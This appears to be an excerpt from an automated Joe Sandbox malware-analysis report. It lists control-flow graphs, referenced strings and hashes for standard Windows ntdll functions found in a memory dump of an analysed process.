                                                                                                                              • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                              • API String ID: 0-929470617
                                                                                                                              • Opcode ID: 3620fc122cafe169c33572ef46109a49a18b8e5fae67ea72c4513c503ffbd7e8
                                                                                                                              • Instruction ID: 1dea1f32d12ba1287eb2786102b86ead6d4f7e29f1c06b5a49f5d2a42ef70327
                                                                                                                              • Opcode Fuzzy Hash: 3620fc122cafe169c33572ef46109a49a18b8e5fae67ea72c4513c503ffbd7e8
                                                                                                                              • Instruction Fuzzy Hash: 7EE1C4716043118FE72ACE68C888B2BBBE5BF84318F144A2DF955CB691D771DB85CB42
                                                                                                                              Function 0182D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 390 182d770-182d7ab 391 182d7b1-182d7bb 390->391 392 182d9e7-182d9ee 390->392 394 1879357 391->394 395 182d7c1-182d7ca 391->395 392->391 393 182d9f4-187932c 392->393 393->391 398 1879332-1879337 393->398 399 1879361-1879370 394->399 395->394 397 182d7d0-182d7d3 395->397 400 182d9da-182d9dc 397->400 401 182d7d9-182d7db 397->401 403 182d927-182d938 call 1854c30 398->403 405 187934b-1879354 call 189f290 399->405 402 182d7e1-182d7e4 400->402 404 182d9e2 400->404 401->394 401->402 402->394 406 182d7ea-182d7ed 402->406 404->406 405->394 409 182d7f3-182d7f6 406->409 410 182d9f9-182da02 406->410 413 182d7fc-182d848 call 182d660 409->413 414 182da0d-182da16 409->414 410->409 415 182da08-1879346 410->415 413->403 420 182d84e-182d852 413->420 414->413 418 182da1c 414->418 415->405 418->399 420->403 421 182d858-182d85f 420->421 422 182d9d1-182d9d5 421->422 423 182d865-182d869 421->423 424 1879563-187957b call 189f290 422->424 425 182d870-182d87a 423->425 424->403 425->424 426 182d880-182d887 425->426 428 182d889-182d88d 426->428 429 182d8ed-182d90d 426->429 432 182d893-182d898 428->432 433 1879372 428->433 431 182d910-182d913 429->431 434 182d915-182d918 431->434 435 182d93b-182d940 431->435 436 182d89e-182d8a5 432->436 437 1879379-187937b 432->437 433->437 438 182d91e-182d920 434->438 439 1879559-187955e 434->439 440 18794d3-18794db 435->440 441 182d946-182d949 435->441 443 182d8ab-182d8e3 call 1858250 436->443 444 18793ea-18793ed 436->444 437->436 442 1879381-18793aa 437->442 446 182d922 438->446 447 182d971-182d98c call 182a6e0 438->447 439->403 448 182da21-182da2f 440->448 449 18794e1-18794e5 440->449 441->448 450 182d94f-182d952 441->450 442->429 451 18793b0-18793ca call 18682c0 442->451 461 182d8e5-182d8e7 443->461 445 18793f1-1879400 call 18682c0 444->445 472 1879417 445->472 473 1879402-1879410 445->473 446->403 468 182d992-182d9ba 447->468 469 1879528-187952d 447->469 457 182d954-182d964 448->457 459 182da35-182da3e 448->459 449->448 456 18794eb-18794f4 449->456 450->434 450->457 451->461 467 18793d0-18793e3 451->467 463 18794f6-18794f9 456->463 464 1879512-1879514 456->464 457->434 465 182d966-182d96f 457->465 459->438 461->429 470 1879420-1879424 461->470 474 1879503-1879506 463->474 475 18794fb-1879501 463->475 464->448 471 187951a-1879523 464->471 465->438 467->451 476 18793e5 467->476 479 182d9bc-182d9be 468->479 469->479 480 1879533-1879536 469->480 470->429 482 187942a-1879430 470->482 471->438 472->470 473->445 481 1879412 473->481 477 187950f 474->477 478 1879508-187950d 474->478 475->464 476->429 477->464 478->471 483 182d9c4-182d9cb 479->483 484 1879549-187954e 479->484 480->479 485 187953c-1879544 480->485 481->429 486 1879457-1879460 482->486 487 1879432-187944f 482->487 483->422 483->425 484->403 488 1879554 484->488 485->431 490 18794a7-18794a9 486->490 491 1879462-1879467 486->491 487->486 489 1879451-1879454 487->489 488->439 489->486 493 18794cc-18794ce 490->493 494 18794ab-18794c6 call 1814508 490->494 491->490 492 1879469-187946d 491->492 495 1879475-18794a1 RtlDebugPrintTimes 492->495 496 187946f-1879473 492->496 493->403 494->403 494->493 495->490 500 18794a3 495->500 496->490 496->495 500->490
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 01879341, 01879366
                                                                                                                              • GsHd, xrefs: 0182D874
                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0187936B
                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01879346
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                              • API String ID: 3446177414-576511823
                                                                                                                              • Opcode ID: f6974a684242795e857b73241c73a6b39eaf66ad5a5d4f487a84b43176c49bd1
                                                                                                                              • Instruction ID: b8030ba48ca5093f36bca077224d35fa26e9bf13c861a24db2331aa880d322d0
                                                                                                                              • Opcode Fuzzy Hash: f6974a684242795e857b73241c73a6b39eaf66ad5a5d4f487a84b43176c49bd1
                                                                                                                              • Instruction Fuzzy Hash: 44E1A471A04356CFDB25CF68C484B6ABBE5BF48318F044A2DF995CB281D771DA84CB52
                                                                                                                              Function 0185B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 501 185b5ec-185b5fc 502 185b600-185b602 501->502 503 185b5fe 501->503 504 185b830-185b844 call 1854b87 502->504 505 185b608-185b60d 502->505 503->502 506 185b621-185b62e 505->506 507 185b60f-185b612 505->507 510 185b631-185b63d call 185b5e6 506->510 507->504 509 185b618-185b61b 507->509 509->504 509->506 514 185b63f-185b644 510->514 515 185b64a-185b653 510->515 514->514 516 185b646-185b648 514->516 517 185b655-185b658 515->517 518 185b65a-185b65d 515->518 516->510 519 185b65f-185b662 517->519 518->519 520 185b665-185b66d 518->520 519->520 521 185b690-185b693 520->521 522 185b66f-185b672 520->522 525 185b695-185b698 521->525 526 185b6ad-185b6d4 call 1856810 521->526 523 185b674 522->523 524 185b67c-185b680 522->524 527 185b676-185b67a 523->527 528 185b682-185b684 524->528 529 185b68a-185b68d 524->529 525->526 530 185b69a-185b69e 525->530 536 185b6d7-185b6e9 call 185b5e6 526->536 527->526 528->529 532 185b686-185b688 528->532 529->521 533 185b6a4-185b6aa 530->533 534 185b6a0-185b6a2 530->534 532->527 533->526 534->526 534->533 539 185b6f3-185b704 call 185b5e6 536->539 540 185b6eb-185b6f1 536->540 546 185b791-185b794 539->546 547 185b70a-185b713 539->547 541 185b71b-185b727 540->541 544 185b797 541->544 545 185b729-185b735 541->545 548 185b79a-185b79e 544->548 549 185b737 545->549 550 185b766-185b769 545->550 546->544 552 185b715 547->552 553 185b718 547->553 554 185b7a0-185b7a2 548->554 555 185b7ad-185b7b0 548->555 556 185b73e-185b741 549->556 557 185b739-185b73c 549->557 551 185b76c-185b786 call 1856580 550->551 578 185b789-185b78c 551->578 552->553 553->541 561 185b7a4 554->561 562 185b7a7-185b7ab 554->562 558 185b7b2-185b7b5 555->558 559 185b7df-185b7ed call 189d8b0 555->559 563 185b757-185b762 556->563 564 185b743-185b746 556->564 557->550 557->556 565 185b7b7-185b7ba 558->565 566 185b80f 558->566 585 185b7f7-185b7fa 559->585 586 185b7ef-185b7f5 559->586 561->562 570 185b815-185b81a 562->570 563->548 567 185b764 563->567 564->563 571 185b748-185b74e 564->571 574 185b7bc-185b7c1 565->574 575 185b7ce-185b7d3 565->575 573 185b812 566->573 567->578 576 185b81c 570->576 577 185b81e-185b821 570->577 571->551 572 185b750 571->572 572->563 580 185b752-185b755 572->580 573->570 574->559 581 185b7c3-185b7c6 574->581 575->566 584 185b7d5 575->584 576->577 582 185b823-185b827 577->582 583 185b829-185b82f 577->583 578->536 580->551 580->563 581->573 587 185b7c8-185b7ca 581->587 582->583 584->559 588 185b7d7-185b7dd 584->588 589 185b805-185b80d 585->589 590 185b7fc-185b803 585->590 586->570 587->559 591 185b7cc 587->591 588->559 588->573 589->570 590->570 591->573
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                                              • Instruction ID: c0fd7fe4c7cbb337bc7ce5a696cb3ec72474d7df15d4656bf008644882bc3219
                                                                                                                              • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                                              • Instruction Fuzzy Hash: DB81C170E052499FEFA58E6CC8917FEBBB3EF65360F184159EC61E7291C7348A408B61
                                                                                                                              Function 01819126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 592 1819126-18191db call 1867eb0 call 1859020 call 1829950 599 18191f1-18191f8 592->599 600 18191dd-18191ee 592->600 599->600 601 18191fa-1819201 599->601 601->600 602 1819203-181921f call 182a250 601->602 602->600 605 1819221-1819227 602->605 606 181922d-1819234 605->606 607 1872518-187251d 605->607 608 1872522-1872529 606->608 609 181923a 606->609 607->600 610 1819241-181929e call 1835b20 608->610 611 187252f-1872539 608->611 609->610 610->600 614 18192a4-18192ba call 18305a0 610->614 611->610 614->600 617 18192c0-187256b RtlDebugPrintTimes 614->617 617->600 620 1872571-187257a 617->620 621 1872651-187265c 620->621 622 1872580-1872595 call 182dd20 620->622 624 18726a0-18726a7 621->624 625 187265e-1872669 RtlDebugPrintTimes ReleaseActCtx 621->625 627 1872597-1872598 call 1823c70 622->627 628 187259d-18725cb call 1829950 622->628 624->600 625->624 627->628 632 1872645-187264c call 1872674 628->632 633 18725cd-18725ea call 182a250 628->633 632->621 633->632 637 18725ec-18725f2 633->637 638 18725f4-18725f9 637->638 639 18725fb-1872638 call 18305a0 637->639 640 187263f 638->640 639->632 643 187263a 639->643 640->632 643->640
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 3446177414-1194432280
                                                                                                                              • Opcode ID: 2344bd99d72cf7bfb67ae64b32e660474ebce94cb5d62cfa24c46ce5b30d432b
                                                                                                                              • Instruction ID: 484e7aad8a1ee3e004b12e9a2031dca0c8c0ff5722b24aa5327914e8fcb79bc4
                                                                                                                              • Opcode Fuzzy Hash: 2344bd99d72cf7bfb67ae64b32e660474ebce94cb5d62cfa24c46ce5b30d432b
                                                                                                                              • Instruction Fuzzy Hash: EA811B72D002699BDB35CB58CC44BEAB7B9AB48714F0041DAEA19F7280D7709F84CFA1
                                                                                                                              Function 01847B2F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81timethreadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                              • String ID: l.7&
                                                                                                                              • API String ID: 4281723722-544070020
                                                                                                                              • Opcode ID: 6a43f60b056958133413fc03aed7487ab1e715188924b1f7f45b3dee353d6e6a
                                                                                                                              • Instruction ID: a77e202e9024f04ab0bfed816ac1d37041db7f0546be02dabbea3a669405ae04
                                                                                                                              • Opcode Fuzzy Hash: 6a43f60b056958133413fc03aed7487ab1e715188924b1f7f45b3dee353d6e6a
                                                                                                                              • Instruction Fuzzy Hash: 9C310476E04219EFCF26EFA8D884A9DBBF1BB48720F10412AE511F7290DB359A00CF54
                                                                                                                              Function 0183DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1413 183db00-183db15 1414 183db1b-183db22 1413->1414 1415 187f5f9-187f603 1413->1415 1416 183db28-183db2f 1414->1416 1417 187f608-187f619 RtlDebugPrintTimes 1414->1417 1415->1417 1418 183db35-183db39 1416->1418 1419 187f61e-187f628 GetPEB 1416->1419 1417->1419 1424 183db70-183db7b GetPEB 1418->1424 1425 183db3b-183db51 1418->1425 1422 187f647-187f64c call 180b970 1419->1422 1423 187f62a-187f645 GetPEB call 180b970 1419->1423 1434 187f651-187f683 call 180b970 * 3 GetPEB 1422->1434 1423->1434 1429 183db81 1424->1429 1430 187f703-187f706 1424->1430 1425->1424 1427 183db53-183db6a 1425->1427 1427->1424 1433 187f69b-187f69e 1427->1433 1435 183db86-183db89 1429->1435 1430->1429 1431 187f70c-187f71a GetPEB 1430->1431 1431->1435 1436 187f6a6-187f6ae 1433->1436 1437 187f6a0 1433->1437 1459 187f685-187f68d 1434->1459 1460 187f694 1434->1460 1439 187f71f-187f72d GetPEB 1435->1439 1440 183db8f-183db95 1435->1440 1442 187f6b0-187f6b7 call 183ffa0 1436->1442 1443 187f6ba-187f6c1 1436->1443 1437->1436 1439->1440 1441 187f733-187f73a 1439->1441 1441->1440 1442->1443 1446 187f6c4-187f6d7 1443->1446 1450 187f6e6-187f6ef 1446->1450 1451 187f6d9-187f6e4 call 183bba0 1446->1451 1450->1424 1453 187f6f5-187f6fe call 183f3e0 1450->1453 1451->1446 1453->1424 1459->1460 1460->1433
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                              • API String ID: 3446177414-56086060
                                                                                                                              • Opcode ID: b5eab509a92903d8edc950d5c3f32ccb6a67cc08dd28e27477a5cc3252b0e80d
                                                                                                                              • Instruction ID: ec656c1231dbc269e7171b3a360dba492ac650a9b1244eec55e1ae9599809ca0
                                                                                                                              • Opcode Fuzzy Hash: b5eab509a92903d8edc950d5c3f32ccb6a67cc08dd28e27477a5cc3252b0e80d
                                                                                                                              • Instruction Fuzzy Hash: 45414771600245DFD726DF6DC494B6AB7E4EF44724F188169E611C7291C774EB80C7D1
                                                                                                                              Function 01894755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1462 1894755-18947a0 call 1894ec6 1465 18947b0-18947b6 1462->1465 1466 18947a2-18947a4 1462->1466 1469 18947de-18947e0 1465->1469 1467 18947ae 1466->1467 1468 18947a6-18947ac 1466->1468 1467->1465 1468->1465 1470 18947b8-18947c5 call 18948a8 1469->1470 1471 18947e2 1469->1471 1479 18947cb 1470->1479 1480 18947c7-18947c9 1470->1480 1472 1894840-1894842 1471->1472 1474 18947e4-18947f1 call 18948a8 1472->1474 1475 1894844 1472->1475 1474->1475 1486 18947f3-18947fb 1474->1486 1477 1894849-1894851 1475->1477 1479->1472 1481 18947cd 1479->1481 1483 18947d0-18947d2 1480->1483 1481->1483 1484 18947dc 1483->1484 1485 18947d4-18947d6 1483->1485 1484->1469 1485->1484 1487 18947d8-18947da 1485->1487 1488 18947fd-1894813 RtlDebugPrintTimes 1486->1488 1489 1894854-189485e 1486->1489 1487->1469 1488->1489 1494 1894815-189481c 1488->1494 1489->1477 1490 1894860-18948a6 GetPEB call 188ea12 1489->1490 1490->1477 1495 1894838-189483e 1494->1495 1496 189481e-1894824 1494->1496 1495->1472 1498 1894832-1894834 1495->1498 1496->1472 1497 1894826-189482e 1496->1497 1497->1497 1499 1894830 1497->1499 1498->1472 1500 1894836 1498->1500 1499->1472 1500->1495
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01894899
                                                                                                                              • LdrpCheckRedirection, xrefs: 0189488F
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01894888
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 3446177414-3154609507
                                                                                                                              • Opcode ID: ff129dbd982ec77b471c98b605538171333e7eee084b1dda1ce2d13fe353c697
                                                                                                                              • Instruction ID: 02c8cee69ea1aebdffe1132f0859cec9b0b4a689c2fb1b25158ca30d4e7b9b6b
                                                                                                                              • Opcode Fuzzy Hash: ff129dbd982ec77b471c98b605538171333e7eee084b1dda1ce2d13fe353c697
                                                                                                                              • Instruction Fuzzy Hash: 1241D432A143599FCF22CE5DDA40A2ABBE4BF89754F09055DED48EB311D731DA02CB91
                                                                                                                              Function 0183DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1501 183dba0-183dbb6 1502 187f73f-187f749 1501->1502 1503 183dbbc-183dbc3 1501->1503 1504 187f74e-187f75f RtlDebugPrintTimes 1502->1504 1503->1504 1505 183dbc9-183dbd0 1503->1505 1507 187f764-187f76e GetPEB 1504->1507 1505->1507 1508 183dbd6-183dbda 1505->1508 1510 187f770-187f78b GetPEB call 180b970 1507->1510 1511 187f78d-187f792 call 180b970 1507->1511 1512 183dbee-183dbf9 GetPEB 1508->1512 1513 183dbdc-183dbe7 call 181ffb0 1508->1513 1519 187f797-187f7c9 call 180b970 * 3 GetPEB 1510->1519 1511->1519 1515 187f7e1-187f7e4 1512->1515 1516 183dbff 1512->1516 1513->1512 1515->1516 1521 187f7ea-187f7f8 GetPEB 1515->1521 1520 183dc04-183dc07 1516->1520 1534 187f7cb-187f7d3 1519->1534 1535 187f7da 1519->1535 1525 187f7fd-187f80a GetPEB 1520->1525 1526 183dc0d-183dc11 1520->1526 1521->1520 1525->1526 1528 187f810-187f817 1525->1528 1528->1526 1534->1535 1535->1515
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                              • API String ID: 3446177414-3526935505
                                                                                                                              • Opcode ID: 53caa54c0f22801dda0f158c389df253aa8792afdd31cf7df7afded36bf625af
                                                                                                                              • Instruction ID: e9d746f7bd0280698bb4240cc5a386ae72b18ae38e8286bfcb54291d0b107a9b
                                                                                                                              • Opcode Fuzzy Hash: 53caa54c0f22801dda0f158c389df253aa8792afdd31cf7df7afded36bf625af
                                                                                                                              • Instruction Fuzzy Hash: 553141342487C8DFD727DB2CC819B66BBE8EF01B54F084148E512C7692C7B8EA81C792
                                                                                                                              Function 0180C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1536 180c070-180c09c call 1867e54 1539 180c0a2-180c0a8 1536->1539 1540 186d618-186d623 RtlDebugPrintTimes 1536->1540 1541 186d63d-186d666 call 182dd20 RtlDebugPrintTimes call 186d66b 1539->1541 1542 180c0ae-180c0bd RtlDebugPrintTimes 1539->1542 1543 186d62b-186d63a 1540->1543 1541->1543 1542->1543
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $
                                                                                                                              • API String ID: 3446177414-3993045852
                                                                                                                              • Opcode ID: a46ad5fa9c2e65ff4a820ecddd5525186a00737771923a7c258114700024f662
